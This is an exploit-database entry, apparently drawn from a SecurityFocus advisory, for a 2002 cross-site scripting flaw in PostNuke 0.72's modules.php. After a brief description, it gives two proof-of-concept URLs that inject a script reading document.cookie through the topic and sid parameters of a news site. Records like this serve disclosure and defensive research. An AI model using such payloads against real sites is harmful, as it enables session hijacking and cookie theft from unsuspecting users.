PostNuke 0.72 - modules.php Cross-Site Scripting

2002-09-26T00:00:00
ID EXPLOITPACK:4097F61E8C979216A91BF99AA51A994C
Type exploitpack
Reporter Mark Grimes
Modified 2002-09-26T00:00:00

Description

PostNuke 0.72 - modules.php Cross-Site Scripting

                                        
                                            source: https://www.securityfocus.com/bid/5809/info

A cross site scripting vulnerability has been reported for PostNuke. 

An attacker may exploit this vulnerability by enticing a victim user to follow a malicious link. Attacker-supplied HTML and script code may be executed on a web client in the context of the site hosting the web-based forum.

http://news.postnuke.com/modules.php?op=modload&name=News&file=index&catid=&topic=>
<script>alert(document.cookie);</script>

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=
<script>alert(document.cookie);</script+>